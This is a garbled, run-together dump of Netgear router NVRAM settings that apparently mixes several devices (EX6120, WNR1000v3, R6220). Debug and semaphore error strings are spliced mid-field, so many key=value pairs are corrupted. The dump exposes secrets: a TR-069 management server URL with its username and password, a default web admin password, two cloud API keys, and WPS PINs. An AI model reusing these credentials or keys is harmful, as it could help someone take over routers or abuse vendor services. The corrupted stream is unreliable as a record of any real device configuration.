D=1MGMT_TELNET_WAN=1sta_band_cur=bothSC_FAX_LEC_FORCE_OFF=1DM_SN_TYPE=0SC_FTR_RELEASE_AND_RETRIEVE_STR=*2#EDCCA_FALSE_CCA_TH=3000SC_SYS_SIP_COMPACT_FORM_ENABLE=0SC_ACCT_1_SIP_SEC_PROXY_PORT=5060ApCliEnable=0SC_ACCT_1_ENABLE=0SC_SYS_FEATURE_DVCC=1SC_MEDIA_CODEC_G723_FMTP=0TR_CLIENT_PORT=0router_arrow_led=0os_version=2.6.36+TR_INFORM_INTERVAL=3600SC_FAX_PASSTHRU_PCMU=1DM_BA_SERVER_PORT=80SC_SYS_T38_STATIC_JB_LEN=210slic_reset=7SC_LINE_1_FLASH_DETECT_DN_LV=100SC_FAX_ONLY_TIMER=5AccessPolicy6=0SC_SYS_CFG_BYPASS_DSP=0SC_ACCT_1_STATS_MT_FAILED=0wl_rpt_wlanstate1=EnableCarrierDetect=0SC_ACCT_1_SIP_PRI_OUTBOUND_PORT=5060psr_alias_oui_5=02:1E:2A:00:00:00SC_SYS_CFG_MAX_ACCT=4SC_LINE_1_TYPEII_CALLER_ID_ACK=1MGMT_SSH_LAN=1LAN_PREFIX6_A=1DM_SELFREG_DST_PORT=16998SC_ACCT_1_TIMER_INTER_DIGIT=3DM_BA_SERVER_AUTH=HMACSC_LINE_1_CNG=0DM_BOOTSTRAP_NOTIFICATION=0wps_model_name=EX6120SC_ACCT_1_SIP_SEC_OUTBOUND_ADDR=0.0.0.0SC_ACCT_1_SIP_PRI_PROXY_PORT=5060SC_ACCT_1_SIP_PRI_REG_ADDR=0.0.0.0AccessPolicy14=0SC_ACCT_1_SYS_STAND_ALONE=0SC_MEDIA_CODEC_ILBC_PT=104TR_DL_STATE=0SC_ACCT_1_SIP_PRI_PROXY_ADDR=0.0.0.0SC_ACCT_1_ADV_CFNA_TARGET=0000SC_LINE_1_DRC=1SC_SYS_VOICE_PLC_ENABLE=1SC_ACCT_1_ADV_CFU=0DM_INTERVAL_ENABLE=1slic_type=32176DM_DEBUG=0WscVendorPinCode=12345670lan_gateway=192.168.1.250DM_CLIENT_PORT=0DM_NODESUPL=suplSC_SF_CS_TOS=0sta_list2=0SC_SYS_SPEED_UP_DIALING=0SC_ACCT_1_SIP_PRIORITY=0SC_ACCT_1_ADV_HIDE_USER_ID=0need_set_lang=1psr_alias_oui_0=02:0F:B5:00:00:00ht40_2g_psr=1client_arrow_led=0SC_ACCT_1_ADV_AUTO_DECLINE=0SC_SF_CS_DST_PORT=1SC_FTR_SERVICE_ENABLE=0MacAddress=00:00:00:00:64:D2TR_SYNC_DM_INTERVAL=5wl0_psr_mrpt=1SC_ACCT_1_MEDIA_ILBC_RATE=1SC_ACCT_1_ADV_HOLD_METHOD=0WAN_GRE_STATUS=DisconnectedTR_SYNC_DM_TYPE=0dhcp_ser_status=enableSC_ACCT_1_MEDIA_7TH_CODEC=3SC_MEDIA_CODEC_G726_PTIME=20SC_FTR_REJECT_WAIT_STR=*9#StationKeepAlive=10SC_FTR_HF_AND_DIGIT_ENABLE=0WSC_UUID_Str1=e11e1cf9-973a-87ff-3360-e5f1777a2b1fApCliKey2Type=0DM_NODENAME_WIMAXSUPP_OPERATOR=MTKSC_ACCT_1_STATS_MT_CONNED=0SC_AUTO_PROV_FTP_TIMEOUT=10WscSetupLock=0SC_AUTO_PROV_FTP_ADDR=0.0.0.0RDRegion=CEconnect_status=0EDCCA_ED_TH=90WscDeviceName=EX6120TR_COOKIE_TYPE=2WAN_DNS=1,0.0.0.0 1,0.0.0.0 1,0.0.0.0SC_FTR_4TH_HF_AND_DIGIT=3,*41#wget_firmware_downloading=0nvram_ver=1LAN_IP=192.168.0.254WAN_MTU=1500SC_ACCT_1_MEDIA_RTP_DETECT_PKT_LOSS=30WAN_ETHIP_PEERIP=0.0.0.0SC_ACCT_1_SIP_DELAY_MEDIA=0SC_ACCT_1_STATS_MO_CONNED=0apClient=1DM_ACC_SVR_NODENAME=serverAuthwlg_sche_wan_state=EnableSC_MEDIA_CODEC_G726_24_PT=97SC_FTR_AUTO_RETRV_DIAL_FAIL=1ApCliKey1Type=0rootap_assoc2=0VHT_BW=1SC_ACCT_1_SIP_PRI_SEP_REG_PORT=5060TR_M_DL_QUEUE=2WAN_TYPE=2sta_list=0VHT_SGI=1SC_FTR_HF_DIGIT_TIMER=3LAN_MTU=1500TR_REDIR_COOKIE_TYPE=0SC_ACCT_1_SIP_OUTBOUND_PORT=5060SC_ACCT_1_AUTO_SWITCH=0VOCONF_VOIP_INI_PATH=/usr/voipSC_MEDIA_CODEC_G726_32_PT=98SC_SYS_QOS_RTP_TOS=0x38DM_BA_SERVER_ID=badrmdDM_IN_BOOTSTRAP=0SC_ACCT_1_DP_COMMON=x.TAccessPolicy10=0SC_ACCT_1_SIP_DISPNAME=1000DM_SELFREG_SRC_PORT=16998WAN_PROTO=0SC_ACCT_1_SIP_REG_ADDR=0.0.0.0DM_BOOTSTRAP_WIB=0TR_DL_FW_SCRIPT=/bin/fwupdate.shload_defaults=1DM_INTERVAL_AUTO=0SC_LINE_1_VOGAIN_RX_LV=0SC_SYS_QOS_SIP_TOS=0x2ESC_ACCT_1_SIP_PRI_OUTBOUND_ADDR=0.0.0.0WscLockForeverPinAttack=3EDCCA_AP_RSSI_TH=-80wla_sche_wlanstate=EnableSC_ACCT_1_SIP_USER_AGENT=UserAgentSC_ACCT_1_ADV_DND_RESP_CODE=480WAN_GRE_PEERIP=0.0.0.0SC_PRV_WMX_BSID_FMT=%02X%02X%02X%02X%02X%02XSC_LINE_1_RTP_IGNORE_MARKER_BIT=0TR_RETRY_MAXTIMES=-1SC_SYS_LED_CFG=0TR_UL_FW=0ApCliKey4Type=0TR_MAX_AUTH_FAIL_RETRY=5DM_BA_CLIENT_NONCE=12345TR_CA_REQUIRED=0SYSLOGD_LOG_LEVEL=7wan_protonvram_get_buf:=1wla_sche_wan_statenvram_get_buf:=00:00:00:00:08:00sem_get:=: Key: true: Key: nvram_get_buf414cb903rootap_assocnvram_get_buf=0:nvram_matchsta_list2:=: Key: 0false414cb903WAN_DNS:=10.10.10.254restart_all_processesHT_AutoBA=1wlg_wlanstatenvram_get_buf:=1eco_tools_dir=/tmp/media/nand/cp.d/cpinstwps_wer_mode=allowwl_obss_coex=1wl_stbc_rx=1led_blink_mode=0eco_http_port=5050wl_rxchain_pwrsave_stas_assoc_check=0wl_plc=0eco_log_file=/tmp/media/nand/log/common.logeco_ext_cgi_dir=/tmp/media/nand/cgieco_soap_ifname=br0wl_radio_pwrsave_stas_assoc_check=0wl_radio_pwrsave_quiet_time=1800eco_mount_point=/tmp/media/nandeco_server_url=http://updates.netgear.com/ecosystem/repomtd3_lang_version=sem_get: Waiting for semaphore timeout (Key: 411000fa, Semaphore: 8001)...wla_wlanstate:=0ipv6_ntp_servers=15 enable_sta_modefalsenvram_match:=disable:nvram_get_bufnvram_get_buf:=) ?wps_aplockdown:=...mtd13_lang_version:=10.0.0.138nvram_get_bufnvram_get_bufsem_get:=falseenable_password_recovery:=enabledKey:=0: wlg_repeaternvram_match: lan_netmaskusb_http_enable:=...nvram_get_bufnvram_matchsem_get8001sem_get:=: )...need_to_load_basic=1ac_dev_name0=0:.usb_http_enablenvram_get_buf:=0cwmp_pinterval=86400cwmp_acsurl=http://tr69.talktalk.net/comserver/node1/tr069wifi_mac14=72:54:00:12:34:55cwmp_eventcode=0wifi_radius_port4=1812cwmp_cpeuser=netgearcpecwmp_pinitv=1wifi_radius_port2=1812cwmp_cpeport=7547cwmp_pintimeout=5000wifi_radius_port3=1812wifi_mac13=72:54:00:12:34:54cwmp_pinnum=1fw_in_rules_flag=0cwmp_catype=dlswsc_device_pin=94229882wsc_config_state=0cwmp_upgrademg=0online_time=0cwmp_wandslcfgenable=0cwmp_iface=wancwmp_wanipconnection=1cwmp_wanconnectiondevice=1cwmp_acsuser=netgearcpecwmp_eventstruct=0cwmp_pinfe=1cwmp_ptime=0000-00-00T00:00:00cwmp_wanpppconnection=1new_pvc=0cwmp_enable=1cwmp_upgrade=1rt_static_route_flag=0cwmp_acspwd=4c5acce55m3th0dcwmp_wanipconenable=1cwmp_cpepwd=4c5acce55m3th0dcwmp_ssl_enable=1cwmp_pinsize=60wsc_config=ap-pbcbserv_ctrl=0fw_action=2ipv6_lan_ipaddr=: Unable to get semaphore!usb_wan_ftp_enablenvram_get_buf:=1wan_default=1wlg_wlanstate:=dhcpwsc_pin_disablegui_region=EnglishWifiSchedule_5GRadioDownnvram_get_buf:=enabledntp_is_syncednvram_get_buf:=dhcpauto_enablenvram_get_buf:=enabledwl0_nctrlsb=upperwl0.1_macmode=disabledwl0.1_radio=1wl_access_ctrl_on=0configured=0wl0_auth=2enable_wizard=1Language_Selection=Autolan1_wps_oob=enabledlan_dhcp=1lan1_wps_reg=enabledwl0.1_mode=aptimereset=5dhcpd_internal=1wl0.1_wps_mode=enabledwl0_nmode_protection=autowps_success_mode=0wl_sectype=1ses_event=2watchdog=5000wl_wfi_pinmode=0wl0.1_key=1StringTable_NonEnglish_Ver=V1.0.0.0wl0_nbw_cap=1Enable_GUIStringTable=1ses_wds_mode=1ses_enable=1setup_wizard_tag=1wl_wfi_enable=0pin_counts=0board_region_default=1wl0.1_ssid=NETGEAR_EXTauto_check_for_upgrade=1ca_finish_success=0lang_available=1 2 3 4 5 6 7 8 9ses_cl_enable=1wl_acl_num=0GUI_Region=Englishfirst_time_login=0wl0.1_bss_enabled=1endis_ssid_broadcast=1wl0_nmode=-1ca_finish=0wl0_vifs=wl0.1nvram_version=1endis_pin=0ses_cl_event=0dns_hijack=0ap_client=1regrev=14lan2_ifnames111=br1il0macaddr=00:FF:FF:FF:FF:FFmcs2gpo2=0x8000wps_unit=0cck2gpo=0x0000wl0_closed=0ledbh0=0x82wl0_wme=onccode=USwl0_country_code=USwsc_device_name=WNR1000v3 (Wireless AP)telnet_enable=0txant=3ledbh3=11pa0b0=0x1865wl0_psq_size=64wl0.1_auth=0mcs2gpo=0xaaa20000wl_hwaddr=00:FF:FF:FF:FF:FFis_modified=0mcs2gpo0=0x0000sromrev=3wl0_plcphdr=longwl0_dtim=2pa0b2=0xfeabbr0_ifnames=vlan2 eth1wps_proc_status:=5wl0.1_ap_isolate=0wl0.1_closed=0mcs2gpo1=0xaaa2wl0_bcn=100wl0_ampdu_txq_size=512wl0_ap_isolate=0antdiv=3ofdm2gpo=0x88220000ledbh2=11wl0_txq_size=320wl0_frag=2346wl0_macmode=disabledl2tp_serv_ip=10.0.0.138pa0b1=0xfa23mcs2gpo3=0xccc8pa0maxpwr=90wl0.1_wme_bss_disable=0ledbh1=11wl0_rts=2347wl0.1_unit=0.1gpio_wps_triggered=0wl0.1_dwds=1wl_dns_skipctf=1wl0_psr_mrt=1go_to_page=info.htmlwl_bss_opmode_cap_reqd=0wl_msglevel=0x101wl_assoc_retry_max=3wps_pbc_vbtn_trigger=1enable_ether_counter_for_dhcpd=0cur_opmode=130Mbpswla_crypto=tkipwl0_dwds=1pppoenvram_match:=falseEnableauth_fail_times=1user_agent=Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/101.0.4951.64 Safari/537.36cwmp_oui=0026F2cwmp_rt_static_route_flag=0cwmp_modelname=R6220cwmp_fw_in_rules_flag=0cwmp_pvcode=R.6220sso_stage=prodsso_url_3=https://appcom.up.netgear.com/UpBackend/deviceRegistration/0:ed_thresh2g=-531:ed_thresh5g=-581:dy_ed_thresh=1sso_timeout=10sso_url_2=https://ocapi.netgear.com/api/v2/ocAuthsso_url_7=https://ocapi.netgear.com/api/v2/ocRequestPasswordResetbd_activated=0genie_enable_bd=1sso_url_4=https://appcom.up.netgear.com/UpBackend/modifyBDStatus/sso_url_0=https://ocapi.netgear.com/api/v2/user/sessionbd_enabled=1sso_url_9=https://nimbus.bitdefender.net/bconnect/netgear_redeem_mgmtsso_url_6=https://appcom.up.netgear.com/UpBackend/updateBD/x_agent_handler_name=1001sso_url_5=https://appcom.up.netgear.com/UpBackend/setUserData/ntp_manual_server=0sso_netgear_email=routerlogin@netgear.com1:ed_thresh2g=-58genie_sso_error_message=1sso_one_cloud_api_key=2a288a1a1561e6a752bc59cbe0132018a7830b96117bcdb1fe67f956cd78288ectf_fa_mode=2sso_up_backend_api_key=duhSjhrUjvM6BIRdzJz7F3CZ5B66zjAodjbfIzZu1FSbxFeB7KxRIwYAXrf3e2WLaws_fw_wait_report_time=60up_base_url=https://devcom.up.netgear.com/UpBackend/sso_url_8=https://nimbus.bitdefender.net/bconnect/netgear_redeem_mgmt0:dy_ed_thresh=1sso_url_1=https://ocapi.netgear.com/api/v2/ocRegister_v2x_force_connection=1x_agent_registered=1wps_pbc_apsta_concurrent=enabledmtd6_lang_version=Unable to get semaphore key! Utilize altenative key.. by SRlink_rate_packet=dummywl_radio_pwrsave_on_time=50fw_spi=1usb_info_dev7=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@http_server_wan_enable=0wifi_mac12=62:c0:02:11:22:33wan_fix_dns=0wifi_wep_on12=0usb_info_dev83=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_auth_type3=3wan_iptype=Dynamicusb_info_dev8=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev63=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_ssid4=NETGEAR_Guest3usb_info_dev53=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev16=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wan_vci_change=0usb_info_dev37=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@interface=wan1,wan2,wan3,wan4,wan5,wan6,wan7,wan8,vlan1,vlan2,vlan3,vlan4,ssid1,ssid2,ssid3,ssid4,PhonePort(1&2)usb_info_dev70=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wiz_language=Englishusb_info_dev67=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wl0_channel=0usb_info_dev32=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@port_trigger_dis=0wifi_def_key2=1usb_info_dev11=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_if_on12=0usb_info_dev6=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev28=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_def_key14=1lan_ipaddr=192.168.1.1upnp_enable=1fw_response_ping=0wan_dod=1usb_info_dev79=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_wep_on13=0mail_block=1wifi_ssid1=NETGEAR-5Gusb_info_dev68=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev45=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_if_on4=0wan_vpi=0usb_info_dev99=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@ntp_custom=0usb_info_dev1=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev30=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@ftp_server_enable=0usb_info_dev75=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@upnp_ttl=4mail_enable=0ftp_server_wan_port=21wifi_if_on2=0fw_import=0wan_vci=38usb_info_dev61=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_def_key4=1wps_config_state=1wan_dslmode=MMODEstatic_if_status=1upnp_adv_time=30wifi_broadcast_ssid14=1ddns_use_wildcards=0rt_rip_version=0usb_info_dev0=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_key_len3=0wifi_allow_guest4=0fw_remote_port=8443usb_info_dev59=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@1:macaddr=01:23:45:67:89:abwifi_if_on1=1pppoe2_schedule_config=127:0:0:23:59wifi_ssid3=NETGEAR_Guest2wan_hwaddr_def=01:23:45:67:89:abport_forward_dis=0wifi_allow_guest3=0wl0_ssid=NETGEAR_11Gwifi_ssid12=NETGEAR-5G_Guestusb_info_dev31=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev15=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@qos_enable=0wifi_ssid13=NETGEAR-5G_Guest2lan_ifnames=eth1 eth2 eth3 eth4wifi_if_on13=0wifi_frag_thre=2346wifi_key_len14=0wifi_broadcast_ssid2=1wifi_dot11_mode1=9usb_info_dev54=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@ssidn=2fw_block_trust_enable=0usb_info_dev78=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@fw_block=0lan_proto=dhcpdhcp_end_ip=192.168.1.254usb_info_dev100=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev51=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_broadcast_ssid12=1wifi_dot11_iso1=0wifi_auth_type2=3usb_info_dev58=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wanif=eth0usb_info_dev38=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev26=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev35=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_allow_guest14=0usb_info_dev73=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_dot11_mode=8wifi_region1=Asiawifi_ssid14=NETGEAR-5G_Guest3wifi_mac=00:c0:02:11:22:33wan_encap=1usb_info_dev46=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@bs_trustedip_enable=0upnp_permission=enablefw_nat=1mail_sh_day=0wifi_present=1wiz_country=USfirstpageiswiz=1usb_info_dev92=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev85=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@popwindow=1wifi_wep_on3=0usb_info_dev93=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_auth_type1=3rip_multicast=1pppoa_idle=0ca_wsectype=wepwifi_wds1=0rt_rip_direction=bothusb_info_dev14=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@fw_acc_port=8080enable_igmp=0wifi_band=2port_trigger_timeout=20wifi_dot11_iso=0usb_info_dev76=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@pppoa_username=Guestwifi_radius_port=1812wan_pppoe_relay=0usb_info_dev17=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev84=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@2:macaddr=01:23:45:67:89:abwifi_allow_guest13=0wan_vpi_change=0fw_time_zone=GMTbusb_info_dev42=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@et0macaddr=01:23:45:67:89:abwifi_auth_type12=3lan_if=br0usb_info_dev33=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_auth_type4=3usb_info_dev98=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev97=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_rts_thre=2347log_gateway=1usb_info_dev56=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev25=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@ddns_enable=0usb_info_dev86=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev29=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev44=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_broadcast_ssid3=1wl_ssid=NETGEARwifi_def_key3=1usb_info_dev52=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wmm_enable=1wifi_wep_on2=0smb_server_enable=1wifi_access_control1=0usb_info_dev57=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@mail_portscan=1time_zone=0http_username=adminwan_mode=dhcpcrestore_defaults=0wan_ifname=eth0usb_info_dev47=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev22=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@blank_state=0wifi_access_control=0usb_info_dev36=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_def_key13=1mail_logfull=0ftp_server_wan_enable=0wifi_key_len2=0schedule_config=127:0:0:23:59mail_dos=1wifi_if_on=1usb_info_dev21=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_wds_apmode=repeaterstorage_share_def=U:USB_Storage:-:0:0T:T_Drive:-:0:0S:S_Drive:-:0:0R:R_Drive:-:0:0http_server_wan_port=443mail_sh_hour=1usb_info_dev34=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_radius_port1=1812wifi_wep_on14=0pppoe_idle=0wifi_broadcast_ssid1=1storage_new_workgroup=Workgroupusb_info_dev69=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev5=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_key_len=0fw_acc_lan=0storage_allow_all=1wifi_broadcast_ssid13=1wifi_wep_on=0usb_info_dev40=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_key_len1=0wifi_auth_type14=3console_loglevel=1wifi_def_key12=1usb_info_dev27=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev9=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev74=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev12=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_auth_type13=3wifi_if_on3=0usb_info_dev55=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_wep_on1=0usb_info_dev96=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_key_len12=0usb_info_dev13=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_wep_on4=0log_block=1wifi_band1=2usb_info_dev41=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_ssid12_abgn=0restore_default=0usb_info_dev66=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_ssid2=NETGEAR_Guestwifi_enable_shortpreamble=1fw_dmz_enable=0fw_disable=00:macaddr=01:23:45:67:89:abwan_def_mac=00:c0:02:11:22:34wifi_region=Asiawifi_channel1=0wifi_wds=0usb_info_dev89=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev87=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev20=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev71=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@storage_machine_name=readysharewifi_broadcast_ssid4=1usb_info_dev94=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@fw_schedule=1111111:00:00-24:00usb_info_dev60=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@pro_count=0usb_info_dev3=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@snmp_enable=0usb_info_dev95=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_allow_guest2=0usb_info_dev72=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_wds_apmode1=pointdhcp_server_enable=1wifi_ssid=NETGEARddns_service_provider=dyndnswifi_dome_off=0needfwcheck=1wifi_ssid12_bgn=0usb_info_dev90=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_if_on14=0wifi_def_key1=1wifi_key_len13=0mail_sendlog=2dis_sip_alg=0usb_info_dev49=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev91=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@log_login=1http_timeout=5usb_info_dev43=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev24=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev62=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@http_password=passwordlan_bipaddr=192.168.0.255usb_info_dev77=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_auth_type=3wifi_keep_wep_page=0usb_info_dev19=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_channel=0wifi_def_key=1http_server_enable=1log_dos=1usb_info_dev23=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev2=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wan_mtu=1500time_zone_x=0usb_info_dev82=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@fw_remote=0usb_info_dev39=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev18=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@dhcp_server_enable8=1dhcp_start_ip7=192.168.6.2pppoa_username3=Guestvoip_line1_ring_valid=disableusb_info_dev50=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@lan_netmask3=255.255.255.0qos_8021q_enable=enablepppoa_username7=Guestwan_mode2=dhcpcatm_mbs8=1200sip_line1_reg_port=5060atm_scr6=524288vlann=4atm_pcr8=524288prov_active_status=disablewan_dod2=1voip_atpm_key=#atm_qos7=ubratm_scr8=524288wan_mtu5=1458wifi_mac3=00:c0:02:12:35:94wan_fix_dns8=0wan_iptype6=Dynamicwan_dod6=1wan_iptype3=Dynamicfw_response_ping6=0prov_period_inteval=1440usb_info_dev4=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@lan_bipaddr4=192.168.3.255pppoe_mtu=1492wan_num=1wifi_mac4=00:c0:02:11:22:36pppoe_idle4=0atm_pcr3=524288pppoa_mtu3=1500atm_pcr4=524288voip_line2_pref_codec=0dhcp_end_ip7=192.168.6.254atm_scr5=524288pptp_present=0wan_mode4=dhcpcwan_mtu7=1458sip_line2_reg_port=5060pppoa_idle3=0wan_iptype2=Dynamicvoip_vad_enable=disablewan_mode6=dhcpcwan_fix_dns2=0qn=4dslmode_present=0lan_bipaddr2=192.168.1.255vlan_on=1voip_line2_ring_id=0pppoe_idle6=0fw_nat4=1lan_bipaddr8=192.168.7.255lan_netmask5=255.255.255.0wan_mtu2=1458fw_nat8=1usb_info_dev48=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@prov_tftp_secondary_port=2400qos_wmm_enable=enablepppoa_mtu4=1500atm_pcr=524288pppoe_idle5=0pppoa_idle4=0fw_nat6=1dhcp_start_ip2=192.168.1.2atm_qos2=ubratm_pcr6=524288wan_dod8=1wan_macaddr_def=52:54:00:12:34:56pppoe_idle8=0atm_mbs=1200dhcp_start_ip3=192.168.2.2dhcp_end_ip4=192.168.3.254atm_scr=524288pppoa_idle8=0atm_qos3=ubrdhcp_end_ip8=192.168.7.254iplist_enable=0atm_mbs6=1200pppoa_idle7=0fw_spi7=1wan_dod7=1fw_spi5=1wan_fix_dns7=0ifmap_lan=1,1,1,1ifmap_wifi=1,1,1,1atm_qos=ubrqn_max=6dhcp_server_enable5=1pstn_prefix=*ifmap_tr069=1pppoe_idle2=0atm_mbs7=1200wifi_broadcast_ssid=1ipoa_present=0atm_qos4=ubrusb_info_dev88=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@pppoa_idle2=0wan_iptype8=Dynamiclan_netmask=255.255.255.0sipalg_present=0pppoa_mtu=1500sip_line2_reg_expire=1200fw_response_ping3=0log_type=0portn=4voip_line1_pref_codec=0pvcn=3ifmap_present=0wan_fix_dns6=0fw_nat2=1sip_line1_proxy_port=5060fw_response_ping4=0sip_line2_reg_headstart=60usb_info_dev10=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@qos_prio_level=3;Low!2;Normal!1;High!0;Highestdhcp_start_ip=192.168.1.2fw_spi6=1voip_ld_timeout=5ethConver=1voip_line2_enable=disablewifi_mac2=62:c0:02:11:22:32wan_mtu4=1458atm_qos5=ubrpppoe_mtu3=1492lan_bipaddr7=192.168.6.255vlan_if=eth0voip_line1_ring_id=0dhcp_start_ip8=192.168.7.2dhcp_end_ip5=192.168.4.254dhcp_server_enable6=1sip_rtp_port=10000wan_iptype7=Dynamicgroupn=8voip_web_hidden=1dhcp_server_enable2=1voip_line1_enable=disablelan_netmask7=255.255.255.0pppoe_idle3=0qos_icmp_enable=disablewan_mode8=dhcpclan_netmask6=255.255.255.0sip_local_port=5060fw_remote_tftp=0fw_nat5=1pppoa_idle6=0voip_fd_timeout=20wan_mtu3=1458wan_iptype4=Dynamicatm_qos6=ubrfw_nat3=1lan_bipaddr5=192.168.4.255dhcp_server_enable4=1pppoe_mtu2=1492wan_fix_dns4=0wan_fix_dns5=0qos_icmp_queue=1voip_line2_pref_fax_codec=1atm_mbs2=1200fw_remote_type=3atm_mbs3=1200ifmap_enable=disableusb_info_dev80=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@qos_tos_mode=1wizard_present=0usb_info_dev81=A200396E0402FF83@1@14.4G@U@1@USB_Storage;